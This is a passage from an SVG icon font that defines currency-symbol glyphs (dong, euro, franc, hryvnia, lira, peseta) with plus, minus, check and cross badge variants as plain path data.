<glyph glyph-name="dong-minus" horiz-adv-x="1000" unicode="&#xe9da;" d="M791 134c-22 23-53 37-87 39h-5c-36 0-68-15-92-39-23-23-38-55-38-91 0-19 4-36 11-52 6-15 16-29 27-40 24-24 56-38 92-38 72 0 130 58 130 130 0 35-14 68-38 91z m-32-108h-120v34h120v-34z m-101 681h-64v76c-10 2-21 3-31 4-11 0-21 1-31 1-10 0-20-1-30-1-11-1-21-2-32-4v-76h-145c-2-12-2-23-2-35 0-12 0-23 2-35h145v-131c-11 3-21 5-33 6-11 1-22 1-33 1-35 0-67-7-96-19s-53-31-74-53c-20-23-36-49-47-79-10-30-16-63-16-97 0-43 7-80 19-110 13-30 30-55 52-73 21-19 47-33 75-42 29-9 59-13 90-13 36 0 68 2 95 6-1 3-1 7-1 10 0 64 38 120 93 145v449h64c1 11 2 23 2 35 0 12 0 23-2 35z m-188-567c-10-3-19-5-27-6-9-1-17-2-28-2-16 0-31 3-45 7-15 4-27 12-37 22-10 10-18 24-24 41-6 17-9 38-9 63 0 20 2 39 6 57 5 18 12 34 21 48 10 13 22 24 36 32 14 8 31 12 51 12 11 0 20 0 27-1 8-1 17-3 29-6v-267z m99-228h-329c-1 12-2 23-2 35 0 12 1 24 2 35h273c12-28 31-52 56-70z" />
<glyph glyph-name="dong-plus" horiz-adv-x="1000" unicode="&#xe9db;" d="M791 134c-22 23-53 37-87 39h-5c-36 0-68-15-92-39-23-23-38-55-38-91 0-19 4-36 11-52 7-15 16-29 27-40 24-24 56-38 92-38 72 0 130 58 130 130 0 35-14 68-38 91z m-30-110h-43v-43h-38v43h-42v38h42v42h38v-42h43v-38z m-103 683h-64v76c-10 2-21 3-31 4-11 0-21 1-31 1-10 0-20-1-30-1-11-1-21-2-32-4v-76h-145c-2-12-2-23-2-35 0-12 0-23 2-35h145v-131c-10 3-21 5-33 6-11 1-22 1-33 1-35 0-67-7-96-20-29-12-53-30-74-52-20-23-36-49-46-79-11-30-17-63-17-97 0-43 7-80 19-110 13-30 30-55 52-73 22-19 47-33 75-42 29-9 59-13 90-13 36 0 68 2 95 6-1 3-1 7-1 10 0 64 38 120 93 144v450h64c1 11 2 23 2 35 0 12 0 23-2 35z m-188-567c-10-3-19-5-27-6-8-1-17-2-28-2-16 0-31 3-45 7-15 4-27 12-37 22-10 10-18 24-24 41-6 17-9 38-9 63 0 20 2 39 7 57 4 18 11 34 20 48 10 13 22 24 36 32 15 8 31 12 51 12 11 0 20 0 28-1 7-1 17-3 29-6v-267h-1z m99-228h-329c-1 12-2 23-2 35 0 12 1 24 2 35h273c12-28 31-52 56-70z" />
<glyph glyph-name="dong-true" horiz-adv-x="1000" unicode="&#xe9dc;" d="M791 134c-22 23-53 37-87 39h-5c-36 0-68-15-92-39-23-23-38-55-38-91 0-19 4-36 11-52 6-15 16-29 27-40 24-24 56-38 92-38 72 0 130 58 130 130 0 35-14 68-38 91z m-24-61l-80-80c-2-2-5-2-7 0l-49 49c-2 2-2 5 0 7l12 12c2 2 6 2 8 0l33-33 64 64c2 2 5 2 7 0l12-12c2-2 2-5 0-7z m-109 634h-64v76c-10 2-21 3-31 4-11 0-21 1-31 1-10 0-20-1-30-1-11-1-21-2-32-4v-76h-145c-2-12-2-23-2-35 0-12 0-23 2-35h145v-131c-11 3-21 5-33 6-11 1-22 1-33 1-35 0-67-7-96-20-29-12-54-30-74-52-20-23-36-49-47-79-10-30-16-63-16-97 0-43 7-80 19-110 13-30 30-55 52-73 21-19 47-33 75-42 29-9 58-13 89-13 37 0 69 2 95 6 0 3 0 7 0 10 0 64 38 120 93 144v450h64c1 11 2 23 2 35 0 12 0 23-2 35z m-188-567c-10-3-19-5-27-6-8-1-17-2-28-2-16 0-31 3-45 7-15 4-27 12-37 22-10 10-18 24-24 41-6 17-9 38-9 63 0 20 2 39 7 57 4 18 11 34 20 48 10 13 22 24 36 32 15 8 31 12 51 12 11 0 20 0 27-1 8-1 18-3 29-6v-267h0z m99-228h-329c-1 12-2 23-2 35 0 12 1 24 2 35h273c12-28 31-52 56-70z" />
<glyph glyph-name="dong" horiz-adv-x="1000" unicode="&#xe9dd;" d="M742 707h-64v76c-10 2-21 3-31 4-11 0-21 1-31 1s-20-1-31-1c-10-1-20-2-31-4v-76h-145c-2-12-3-23-3-36 0-11 1-23 3-34h145v-131c-11 3-21 5-33 6-11 0-22 1-33 1-35 0-67-7-96-19-29-13-54-31-74-53-20-22-36-49-47-79-11-31-16-63-16-97 0-43 6-80 19-110 13-30 30-55 51-74 22-19 47-32 76-41 28-9 58-13 89-13 41 0 76 2 104 7 29 4 57 11 84 19v584h64c1 11 2 23 2 35 0 12 0 23-2 35z m-188-567c-10-3-19-5-27-6-9-1-18-2-28-2-16 0-31 3-45 7-15 5-27 12-37 22-10 10-19 24-24 41-6 17-9 38-9 63 0 20 2 39 6 57 5 18 12 34 21 48 10 13 21 24 36 32 14 8 31 13 51 13 11 0 20-1 27-2 8-1 17-3 29-6v-267h0z m43-158h-273c-1-11-2-23-2-35 0-12 1-23 2-35h334c1 12 2 23 2 35 0 12-1 24-2 35h-61z" />
<glyph glyph-name="euro-false" horiz-adv-x="1000" unicode="&#xe9de;" d="M902 175c-22 21-51 34-83 36h-4c-34 0-65-14-87-36-22-22-36-53-36-87 0-18 4-34 10-49 6-14 15-27 26-38 22-22 53-36 87-36 68 0 123 55 123 123 0 34-14 65-36 87z m-37-118l-20-20-30 31-31-31-20 20 30 31-30 30 20 21 31-31 30 31 20-21-30-30 30-31z m-452 501c-20-25-35-56-45-94h306l-43-84h-276c0-11-1-21-1-32l1-14h276l-40-85h-227c25-117 100-177 225-177 21 0 40 1 57 4 3-37 20-70 45-95 11-12 25-22 40-29-24-8-45-12-65-15-31-5-65-7-101-7-64 0-120 10-168 31-49 21-89 50-122 87s-58 82-74 133c-7 22-12 44-16 68h-122l38 85h76c0 5-1 9-1 14 0 11 1 21 1 32h-113l42 84h83c3 18 8 35 13 52 18 52 42 96 75 134 33 37 73 67 121 88 48 21 102 32 163 32 37 0 70-3 100-7 31-5 64-14 99-28-1-23-6-45-13-66-8-22-16-44-25-65-26 9-50 15-70 19-21 4-45 5-73 5-72 0-127-23-166-70z" />
<glyph glyph-name="euro-minus" horiz-adv-x="1000" unicode="&#xe9df;" d="M902 175c-22 21-51 34-83 36h-4c-34 0-65-14-87-36-22-22-36-53-36-87 0-18 4-34 10-49 6-14 15-27 26-38 22-22 53-36 87-36 68 0 123 55 123 123 0 34-14 65-36 87z m-31-103h-113v32h113v-32h0z m-458 486c-20-25-35-56-45-94h306l-43-84h-276c0-11-1-21-1-32l1-14h276l-40-85h-227c25-117 100-177 225-177 21 0 40 1 57 4 3-37 20-70 45-95 11-12 25-22 40-29-24-8-45-12-65-15-31-5-65-7-101-7-64 0-120 10-168 31-49 21-89 50-122 87s-58 82-74 133c-7 22-12 44-16 68h-122l38 85h76c0 5-1 9-1 14 0 11 1 21 1 32h-113l42 84h83c3 18 8 35 13 52 18 52 42 96 75 134 33 37 73 67 121 88 48 21 102 32 163 32 37 0 70-3 100-7 31-5 64-14 99-28-1-23-6-45-13-66-8-22-16-44-25-65-26 9-50 15-70 19-21 4-45 5-73 5-72 0-127-23-166-70z" />
<glyph glyph-name="euro-plus" horiz-adv-x="1000" unicode="&#xe9e0;" d="M902 176c-22 21-51 34-83 36h-4c-34 0-64-14-87-36-22-22-36-53-36-87 0-17 4-34 11-48 6-15 14-28 25-39 23-22 53-35 87-35 68 0 122 55 122 122 1 34-13 65-35 87z m-29-105h-40v-40h-36v40h-40v36h40v40h36v-40h40v-36z m-462 486c-20-24-35-55-44-93h305l-43-84h-275c0-10-1-21-1-32l1-14h275l-40-84h-226c25-117 99-176 224-176 21 0 40 1 57 3 3-37 19-70 44-95 12-11 25-21 40-28-23-8-44-12-64-15-32-5-65-7-101-7-64 0-120 10-168 31-48 21-88 50-121 87s-57 81-74 132c-7 22-12 44-16 68h-121l38 84h75c0 5 0 10 0 14 0 11 0 21 1 32h-113l42 84h82c4 18 8 35 14 52 17 51 42 95 74 133 33 37 73 67 121 88 48 21 102 31 163 31 36 0 69-2 99-6 31-5 63-14 99-29-2-22-6-44-14-65-7-22-16-43-25-65-26 9-49 15-70 19-20 4-44 6-71 6-72 0-128-24-167-71z" />
<glyph glyph-name="euro-true" horiz-adv-x="1000" unicode="&#xe9e1;" d="M902 176c-21 21-50 34-82 36h-4c-34 0-65-14-87-36-22-22-36-53-36-86 0-18 4-34 11-49 5-14 14-27 25-38 22-22 53-36 86-36 68 0 123 55 123 123 0 33-14 64-36 86z m-23-58l-75-75c-2-2-5-2-7 0l-45 46c-2 2-2 5 0 7l11 11c1 2 5 2 7 0l31-31 60 60c2 2 5 2 7 0l11-11c2-2 2-5 0-7z m-468 438c-21-24-35-55-45-93h304l-43-84h-273c-1-10-1-20-1-31l0-14h274l-40-84h-225c25-117 99-176 223-176 21 0 40 1 57 3 3-36 20-69 44-94 12-11 25-21 40-29-23-7-44-11-64-15-31-4-65-6-100-6-64 0-120 10-168 31-47 20-88 49-120 86-33 37-57 81-74 132-7 22-12 44-16 68h-121l38 84h75c0 5-1 10-1 14 0 11 1 21 2 31h-113l42 84h82c3 18 8 35 13 52 18 51 42 96 75 133 33 37 72 67 120 87 48 21 102 32 162 32 36 0 69-2 99-7 31-4 64-14 99-28-2-22-6-44-14-65-7-22-15-43-24-65-26 9-50 15-70 19-20 4-44 6-72 6-71 0-127-24-165-71z" />
<glyph glyph-name="euro" horiz-adv-x="1000" unicode="&#xe9e2;" d="M855 19c-7 23-15 46-25 68-28-10-53-16-75-20s-47-6-76-6c-130 0-208 61-234 184h236l42 88h-288c0 5 0 10 0 15 0 12 0 22 1 33h287l45 88h-319c10 39 25 72 47 98 40 49 98 74 173 74 29 0 54-2 76-6 21-4 45-11 73-20 9 22 18 45 25 67s13 46 15 69c-37 15-72 25-103 30-32 4-67 7-105 7-63 0-120-11-170-33s-92-53-126-92-60-86-78-140c-6-17-10-35-14-54h-86l-44-88h118c0-11-1-22-1-33 0-5 0-10 0-15h-78l-41-88h128c4-24 9-48 17-71 17-53 43-100 77-138 34-39 76-70 127-91 50-22 108-32 175-32 38 0 73 2 105 7 33 4 70 14 111 29-4 23-8 47-15 70z" />
<glyph glyph-name="frank-false" horiz-adv-x="1000" unicode="&#xe9e3;" d="M789 167c-23 23-53 37-87 38h-4c-36 0-68-14-91-38-24-23-38-55-38-90 0-19 4-36 11-51 6-15 16-29 27-40 23-24 55-38 91-38 71 0 128 58 128 129 0 35-14 67-37 90z m-38-122l-22-21-31 32-32-32-21 21 31 32-31 32 21 21 32-32 31 32 22-21-32-32 32-32z m-315 605v-188h231c4-24 6-47 6-69 0-24-2-47-6-70h-231v-130h113c-25-28-40-64-40-105 0-11 1-22 4-32h-77v-137c-29-4-55-7-80-7-28 0-55 3-83 7v137h-99v137h99v595h454c4-23 6-45 6-68 0-25-2-48-6-70h-291z" />
<glyph glyph-name="frank-minus" horiz-adv-x="1000" unicode="&#xe9e4;" d="M786 167c-22 23-53 37-86 38h-5c-35 0-68-14-91-38-23-23-37-55-37-90 0-19 3-36 10-51 7-15 16-29 27-40 23-24 56-38 91-38 71 0 128 58 128 129 0 35-14 67-37 90z m-32-107h-118v34h118l0-34z m-316 590v-188h231c5-24 7-47 7-69 0-24-2-47-7-70h-231v-130h114c-25-28-40-64-40-105 0-11 1-22 3-32h-77v-137c-28-4-55-7-80-7-27 0-55 3-82 7v137h-99v137h99v595h453c5-23 7-45 7-68 0-25-2-48-7-70h-291z" />
<glyph glyph-name="frank-plus" horiz-adv-x="1000" unicode="&#xe9e5;" d="M788 164c-22 22-52 36-86 38h-4c-36 0-68-15-91-38-23-23-38-55-38-91 0-18 4-35 11-51 6-15 15-28 27-40 23-23 55-37 91-37 71 0 128 58 128 128 0 36-14 68-38 91z m-29-110h-43v-41h-37v41h-42v38h42v42h37v-42h43v-38z m-323 596v-188h231c4-24 6-47 6-69 0-24-2-47-6-70h-231v-130h113c-25-28-40-64-40-105 0-11 1-22 4-32h-77v-137c-29-4-55-7-80-7-28 0-55 3-83 7v137h-98v137h98v595h454c4-23 6-45 6-68 0-25-2-48-6-70h-291z" />
<glyph glyph-name="frank-true" horiz-adv-x="1000" unicode="&#xe9e6;" d="M785 178c-23 23-53 37-86 38h-5c-36 0-68-14-91-38-23-23-38-55-38-90 0-19 4-36 11-51 6-15 16-29 27-40 23-24 56-38 91-38 71 0 128 58 128 129 0 35-14 67-37 90z m-24-60l-79-79c-2-2-5-2-7 0l-48 48c-2 2-2 6 0 7l11 12c2 2 6 2 8 0l32-33 64 63c2 3 5 3 7 0l12-11c2-2 2-6 0-7z m-321 532v-188h231c4-24 6-47 6-69 0-24-2-47-6-70h-231v-130h113c-25-28-40-64-40-105 0-11 1-22 4-32h-77v-137c-29-4-55-7-80-7-28 0-55 3-83 7v137h-99v137h99v595h454c4-23 6-45 6-68 0-25-2-48-6-70h-291z" />
<glyph glyph-name="frank" horiz-adv-x="1000" unicode="&#xe9e7;" d="M648 650h125c4 22 6 45 6 70 0 23-2 45-6 68h-454v-595h-99v-137h99v-137c28-4 55-7 82-7 25 0 52 3 80 7v137h153c4 22 7 45 7 70 0 22-3 45-7 67h-153v130h231c5 23 7 46 7 70 0 22-2 45-7 69h-231v188l167 0z" />
<glyph glyph-name="hryvnia-false" horiz-adv-x="1000" unicode="&#xe9e8;" d="M852 157c-22 22-53 36-86 38h-5c-36 0-68-15-91-38-24-23-38-56-38-91 0-18 4-36 11-51 6-15 16-29 27-40 23-24 55-38 91-38 71 0 129 58 129 129 0 35-14 68-38 91z m-38-123l-21-21-32 32-32-32-21 21 32 32-32 32 21 21 32-32 32 32 21-21-32-32 32-32z m-202 313c-13-7-25-14-38-20h181l-16-66h-345c-18-9-33-19-46-30-20-16-29-39-29-70 0-19 4-36 13-50 8-15 20-27 34-36 14-9 30-16 47-21 17-5 34-7 52-7 32 0 64 8 93 23 10 4 19 10 27 17-3-11-4-22-4-34 0-44 20-83 51-109-5-2-10-4-14-6-48-17-98-25-150-25-41 0-79 5-116 16-37 11-69 28-98 49-27 22-49 50-66 83-16 34-25 73-25 118 0 31 5 58 13 82h-66l15 66h91c15 17 31 31 50 42l7 4h-143l13 67h304l9 3c29 11 54 24 73 39 20 15 29 36 29 65 0 18-3 35-11 48-8 14-18 25-31 34-13 9-28 15-44 19-16 4-33 6-50 6-29 0-56-6-83-16-26-11-47-27-63-50l-108 114c33 30 70 52 111 66 41 13 84 20 128 20 38 0 76-6 113-16 37-10 69-25 98-46 28-21 52-47 69-78 18-32 26-69 26-112 0-38-5-70-17-96h78l-16-67h-113c-10-10-21-19-33-26z" />
<glyph glyph-name="hryvnia-minus" horiz-adv-x="1000" unicode="&#xe9e9;" d="M852 157c-22 22-53 36-86 38h-5c-36 0-68-15-91-38-24-23-38-56-38-91 0-18 4-36 11-51 6-15 16-29 27-40 23-24 55-38 91-38 71 0 129 58 129 129 0 35-14 68-38 91z m-32-108h-118v34h118v-34z m-208 298c-13-7-25-14-38-20h181l-16-66h-345c-18-9-33-19-46-30-20-16-29-39-29-70 0-19 4-36 13-50 8-15 20-27 34-36 14-9 30-16 47-21 17-5 34-7 52-7 32 0 64 8 93 23 10 4 19 10 27 17-3-11-4-22-4-34 0-44 20-83 51-109-5-2-10-4-14-6-48-17-98-25-150-25-41 0-79 5-116 16-37 11-69 28-98 49-27 22-49 50-66 83-16 34-25 73-25 118 0 31 5 58 13 82h-66l15 66h91c15 17 31 31 50 42l7 4h-143l13 67h304l9 3c29 11 54 24 73 39 20 15 29 36 29 65 0 18-3 35-11 48-8 14-18 25-31 34-13 9-28 15-44 19-16 4-33 6-50 6-29 0-56-6-83-16-26-11-47-27-63-50l-108 114c33 30 70 52 111 66 41 13 84 20 128 20 38 0 76-6 113-16 37-10 69-25 98-46 28-21 52-47 69-78 18-32 26-69 26-112 0-38-5-70-17-96h78l-16-67h-113c-10-10-21-19-33-26z" />
<glyph glyph-name="hryvnia-plus" horiz-adv-x="1000" unicode="&#xe9ea;" d="M850 160c-22 22-53 36-86 37h-5c-36 0-68-14-91-37-24-24-38-56-38-91 0-19 4-36 11-52 6-15 15-28 27-40 23-23 55-37 91-37 71 0 129 57 129 129 0 35-14 67-38 91z m-30-110h-42v-43h-38v43h-42v37h42v42h38v-42h42v-37z m-207 297c-12-7-25-14-38-20h182l-16-66h-346c-17-9-33-19-46-30-19-16-29-39-29-70 0-19 4-36 13-50 8-15 20-27 34-36 14-9 30-16 47-21 17-5 34-7 52-7 33 0 64 8 93 23 10 4 19 10 27 17-3-11-4-22-4-34 0-44 20-83 51-109-4-2-9-4-14-6-48-17-98-25-150-25-40 0-79 5-116 16-37 11-69 28-97 49-28 22-50 50-67 83-16 34-24 73-24 118 0 31 4 58 12 82h-66l16 66h91c14 17 30 31 49 42l7 4h-143l13 67h304l10 3c29 11 53 24 72 39 20 15 30 36 30 65 0 18-4 35-12 48-8 14-18 25-31 34-13 9-28 15-44 19-16 4-32 6-50 6-29 0-56-6-83-16-26-11-47-27-63-50l-108 114c33 30 70 52 111 66 41 13 84 20 128 20 38 0 76-6 113-16s69-25 98-46c29-21 52-47 69-78 18-32 27-69 27-112 0-38-6-70-18-96h79l-16-67h-113c-11-10-22-19-34-26z" />
<glyph glyph-name="hryvnia-true" horiz-adv-x="1000" unicode="&#xe9eb;" d="M852 157c-22 22-53 36-86 38h-5c-36 0-68-15-91-38-24-23-38-56-38-91 0-18 4-36 11-51 6-15 16-29 27-40 23-24 55-38 91-38 71 0 129 58 129 129 0 35-14 68-38 91z m-24-61l-79-79c-2-2-5-2-7 0l-48 48c-3 2-3 6 0 8l11 11c2 3 6 3 8 0l33-32 63 63c2 2 5 2 8 0l11-11c2-3 2-6 0-8z m-216 251c-13-7-25-14-38-20h181l-16-66h-345c-18-9-33-19-46-30-20-16-29-39-29-70 0-19 4-36 13-50 8-15 20-27 34-36 14-9 30-16 47-21 17-5 34-7 52-7 32 0 64 8 93 23 10 4 19 10 27 17-3-11-4-22-4-34 0-44 20-83 51-109-5-2-10-4-14-6-48-17-98-25-150-25-41 0-79 5-116 16-37 11-69 28-98 49-27 22-49 50-66 83-16 34-25 73-25 118 0 31 5 58 13 82h-66l15 66h91c15 17 31 31 50 42l7 4h-143l13 67h304l9 3c29 11 54 24 73 39 20 15 29 36 29 65 0 18-3 35-11 48-8 14-18 25-31 34-13 9-28 15-44 19-16 4-33 6-50 6-29 0-56-6-83-16-26-11-47-27-63-50l-108 114c33 30 70 52 111 66 41 13 84 20 128 20 38 0 76-6 113-16 37-10 69-25 98-46 28-21 52-47 69-78 18-32 26-69 26-112 0-38-5-70-17-96h78l-16-67h-113c-10-10-21-19-33-26z" />
<glyph glyph-name="hryvnia" horiz-adv-x="1000" unicode="&#xe9ec;" d="M703 373h113l16 67h-78c11 26 17 58 17 96 0 43-8 80-26 112-18 31-41 57-69 78-29 21-62 36-98 46-37 10-75 16-113 16-44 0-87-7-128-20s-78-36-111-66l108-114c16 22 37 39 63 50 26 10 54 15 83 15 17 0 34-1 50-5 16-4 31-11 44-19 13-9 23-20 31-34s11-30 11-49c0-28-9-49-29-64-20-15-44-28-73-39l-10-3h-303l-14-67h143c-2-1-4-3-7-4-18-12-34-26-49-42h-91l-15-66h65c-8-24-12-51-12-83 0-44 8-83 25-117s38-61 66-83c28-22 60-38 97-49 37-11 76-17 117-17 51 0 101 9 149 26 48 17 89 46 124 87l-112 109c-18-28-42-49-71-64-30-16-61-23-94-23-17 0-34 2-52 7-17 5-32 12-47 21-14 9-25 21-34 36-8 14-13 31-13 50 0 30 10 54 30 70 13 11 28 21 45 30h346l16 66h-181c13 6 25 13 37 20 12 8 24 16 34 26z" />
<glyph glyph-name="lira-false" horiz-adv-x="1000" unicode="&#xe9ed;" d="M864 157c-22 22-52 36-85 37h-5c-35 0-66-14-89-37-23-23-37-54-37-89 0-18 3-35 10-51 6-15 16-28 27-39 23-23 54-37 89-37 71 0 127 57 127 127 0 35-14 66-37 89z m-37-121l-21-21-32 32-31-32-21 21 31 32-31 31 21 21 31-32 32 32 21-21-32-31 32-32z m-434 518c-5-17-7-32-7-48 0-4 0-7 0-10h175c2-13 3-25 4-35 1-11 2-21 2-32 0-11-1-21-2-31-1-9-2-20-4-31h-160l11-64h149c2-13 3-24 4-35 1-10 2-21 2-32 0-10-1-20-2-30-1-9-2-20-4-32h-142c-1-10-2-20-3-30-5-24-14-50-27-78h207c0-4 0-7 0-10 0-65 39-120 95-144h-554l-5 17 16 14c18 14 32 33 44 53 12 22 22 43 29 66 7 23 13 45 17 67 3 17 4 32 5 45h-138c-3 12-4 23-5 32-1 10-1 20-1 30 0 11 0 22 1 32 1 11 2 22 5 35h126l-10 64h-116c-3 11-4 22-5 31-1 10-1 20-1 31 0 10 0 21 1 32 1 10 2 22 5 35h101c0 8-1 16-1 24 0 33 6 66 18 98s30 60 54 85c25 25 56 46 94 61 37 16 81 24 133 24 45 0 83-4 114-10 32-7 61-16 89-27-2-19-5-40-11-65s-15-50-28-76c-23 9-45 16-67 23-21 6-48 10-81 10-25 0-47-5-64-13-17-9-31-19-41-33-10-12-18-27-22-43z" />
<glyph glyph-name="lira-minus" horiz-adv-x="1000" unicode="&#xe9ee;" d="M864 157c-22 22-52 36-85 37h-5c-35 0-66-14-89-37-23-23-37-54-37-89 0-18 3-35 10-51 6-15 16-28 27-39 23-23 54-37 89-37 71 0 127 57 127 127 0 35-14 66-37 89z m-31-106h-117v33h117v-33z m-440 503c-5-17-7-32-7-48 0-4 0-7 0-10h175c2-13 3-25 4-35 1-11 2-21 2-32 0-11-1-21-2-31-1-9-2-20-4-31h-160l11-64h149c2-13 3-24 4-35 1-10 2-21 2-32 0-10-1-20-2-30-1-9-2-20-4-32h-142c-1-10-2-20-3-30-5-24-14-50-27-78h207c0-4 0-7 0-10 0-65 39-120 95-144h-554l-5 17 16 14c18 14 32 33 44 53 12 22 22 43 29 66 7 23 13 45 17 67 3 17 4 32 5 45h-138c-3 12-4 23-5 32-1 10-1 20-1 30 0 11 0 22 1 32 1 11 2 22 5 35h126l-10 64h-116c-3 11-4 22-5 31-1 10-1 20-1 31 0 10 0 21 1 32 1 10 2 22 5 35h101c0 8-1 16-1 24 0 33 6 66 18 98s30 60 54 85c25 25 56 46 94 61 37 16 81 24 133 24 45 0 83-4 114-10 32-7 61-16 89-27-2-19-5-40-11-65s-15-50-28-76c-23 9-45 16-67 23-21 6-48 10-81 10-25 0-47-5-64-13-17-9-31-19-41-33-10-12-18-27-22-43z" />
<glyph glyph-name="lira-plus" horiz-adv-x="1000" unicode="&#xe9ef;" d="M858 157c-21 22-52 36-85 37h-4c-35 0-67-14-90-37-23-23-37-54-37-89 0-18 4-35 10-51 7-15 16-28 27-39 23-23 55-37 90-37 70 0 127 57 127 127 0 35-14 66-38 89z m-29-108h-42v-42h-37v42h-41v37h41v42h37v-42h42v-37z m-431 505c-4-17-6-32-6-48 0-4 0-7 0-10h174c3-13 4-25 5-35 1-11 1-21 1-32 0-11 0-21-1-31-1-9-2-20-5-31h-159l10-64h149c3-13 4-24 5-35 1-10 1-21 1-32 0-10 0-20-1-30-1-9-2-20-5-32h-141c-1-10-2-20-4-30-4-24-13-50-27-78h208c0-4 0-7 0-10 0-65 39-120 95-144h-554l-5 17 16 14c17 14 32 32 44 53 12 22 21 43 29 66 7 23 13 45 16 67 3 17 5 32 6 45h-138c-3 12-4 23-5 32-1 10-2 20-2 30 0 11 1 22 2 32 1 11 2 22 5 35h125l-10 64h-115c-3 11-4 22-5 31-1 10-2 20-2 31 0 10 1 21 2 32 1 10 2 22 5 35h101c-1 8-2 16-2 24 0 33 7 66 18 98 12 32 31 60 55 85 25 25 56 46 93 61 37 16 82 24 134 24 45 0 83-4 114-10 31-7 61-16 89-27-2-19-6-40-11-65-6-25-15-50-29-76-23 9-45 16-66 23-22 6-49 10-81 10-26 0-47-5-64-13-17-9-31-19-42-33-10-12-17-27-22-43z" />
<glyph glyph-name="lira-true" horiz-adv-x="1000" unicode="&#xe9f0;" d="M864 157c-22 22-52 36-85 37h-5c-35 0-66-14-89-37-23-23-37-54-37-89 0-18 3-35 10-51 6-15 16-28 27-39 23-23 54-37 89-37 71 0 127 57 127 127 0 35-14 66-37 89z m-24-60l-77-78c-2-2-6-2-8 0l-47 48c-2 2-2 5 0 7l11 11c2 3 6 3 8 0l32-32 63 63c2 2 5 2 7 0l11-12c2-1 2-5 0-7z m-447 457c-5-17-7-32-7-48 0-4 0-7 0-10h175c2-13 3-25 4-35 1-11 2-21 2-32 0-11-1-21-2-31-1-9-2-20-4-31h-160l11-64h149c2-13 3-24 4-35 1-10 2-21 2-32 0-10-1-20-2-30-1-9-2-20-4-32h-142c-1-10-2-20-3-30-5-24-14-50-27-78h207c0-4 0-7 0-10 0-65 39-120 95-144h-554l-5 17 16 14c18 14 32 33 44 53 12 22 22 43 29 66 7 23 13 45 17 67 3 17 4 32 5 45h-138c-3 12-4 23-5 32-1 10-1 20-1 30 0 11 0 22 1 32 1 11 2 22 5 35h126l-10 64h-116c-3 11-4 22-5 31-1 10-1 20-1 31 0 10 0 21 1 32 1 10 2 22 5 35h101c0 8-1 16-1 24 0 33 6 66 18 98s30 60 54 85c25 25 56 46 94 61 37 16 81 24 133 24 45 0 83-4 114-10 32-7 61-16 89-27-2-19-5-40-11-65s-15-50-28-76c-23 9-45 16-67 23-21 6-48 10-81 10-25 0-47-5-64-13-17-9-31-19-41-33-10-12-18-27-22-43z" />
<glyph glyph-name="lira" horiz-adv-x="1000" unicode="&#xe9f1;" d="M805 26c-1 13-2 26-5 40h-317c14 28 23 54 27 78 2 10 3 20 4 30h141c2 12 4 23 5 32 1 10 1 20 1 30 0 11 0 22-1 33-1 10-2 22-5 34h-149l-10 64h159c2 11 4 22 5 32 1 9 1 19 1 30 0 11 0 22-1 32-1 10-3 22-5 35h-174c-1 3-1 7-1 10 0 16 3 32 7 48 4 16 12 31 22 44 10 13 24 23 41 32 17 8 39 13 64 13 33 0 60-3 82-10 21-6 43-14 66-23 13 26 23 51 28 76 6 25 10 46 11 65-28 11-57 20-88 27-31 6-70 9-115 9-51 0-96-7-133-23-38-15-69-35-93-61-25-25-43-53-55-85-12-32-18-65-18-98 0-8 1-16 1-25h-100c-3-12-4-24-5-34-1-11-2-21-2-32 0-11 1-21 2-31 1-9 2-20 5-32h115l10-63h-125c-3-13-4-25-5-35-1-10-2-21-2-32 0-11 1-21 2-30 1-9 2-20 5-32h137c0-13-2-28-5-46-4-21-9-43-17-66-7-23-17-45-29-66-12-21-26-39-43-53l-16-14 5-17h568c3 14 4 27 5 40 1 12 1 25 1 38 0 12 0 24-1 36z" />
<glyph glyph-name="peseta-false" horiz-adv-x="1000" unicode="&#xe9f2;" d="M775 181c-23 22-53 36-86 37h-5c-36 0-68-14-91-37-23-23-38-56-38-91 0-18 4-35 11-51 6-15 16-29 27-40 23-23 55-38 91-38 71 0 128 58 128 129 0 35-14 68-37 91z m-38-123l-21-21-32 32-32-32-21 21 31 32-31 32 21 21 32-32 32 32 21-21-32-32 32-32z m153 475h-93c-4 42-13 78-29 107-20 39-47 70-80 91s-70 37-111 45c-40 8-81 12-120 12-38 0-76-1-113-3-38-2-74-5-111-8v-244h-123c-2-16-4-33-4-50 0-16 2-33 4-49h123v-516c16-2 31-4 47-5 15 0 28-1 41-1 14 0 28 1 42 1 14 1 29 3 44 5v275c8-1 16-1 25-2 10 0 19 0 30 0 24 0 48 1 73 5 5 7 11 14 18 21 32 32 76 52 125 52 12 0 23-1 34-3 22 20 41 44 57 73 14 26 23 58 27 96h95c2 15 3 32 3 49 0 17-1 33-4 49z m-282-118c-9-19-20-35-35-47-15-12-32-20-51-26-19-5-38-7-58-7h-30c-9 0-18 1-27 2v97h207c-2-6-4-13-6-19z m-201 118v107c14 2 25 3 32 3 8 1 16 1 25 1 20 0 39-3 58-8 19-5 36-14 51-26 14-12 26-29 35-49 4-8 6-18 8-28l-209 0z" />
<glyph glyph-name="peseta-minus" horiz-adv-x="1000" unicode="&#xe9f3;" d="M775 181c-23 22-53 36-86 37h-5c-36 0-68-14-91-37-23-23-38-56-38-91 0-18 4-35 11-51 6-15 16-29 27-40 23-23 55-38 91-38 71 0 128 58 128 129 0 35-14 68-37 91z m-32-108h-118v34h118l0-34z m147 460h-93c-4 42-13 78-29 107-20 39-47 70-80 91s-70 37-111 45c-40 8-81 12-120 12-38 0-76-1-113-3-38-2-74-5-111-8v-244h-123c-2-16-4-33-4-50 0-16 2-33 4-49h123v-516c16-2 31-4 47-5 15 0 28-1 41-1 14 0 28 1 42 1 14 1 29 3 44 5v275c8-1 16-1 25-2 10 0 19 0 30 0 24 0 48 1 73 5 5 7 11 14 18 21 32 32 76 52 125 52 12 0 23-1 34-3 22 20 41 44 57 73 14 26 23 58 27 96h95c2 15 3 32 3 49 0 17-1 33-4 49z m-282-118c-9-19-20-35-35-47-15-12-32-20-51-26-19-5-38-7-58-7h-30c-9 0-18 1-27 2v97h207c-2-6-4-13-6-19z m-201 118v107c14 2 25 3 32 3 8 1 16 1 25 1 20 0 39-3 58-8 19-5 36-14 51-26 14-12 26-29 35-49 4-8 6-18 8-28l-209 0z" />
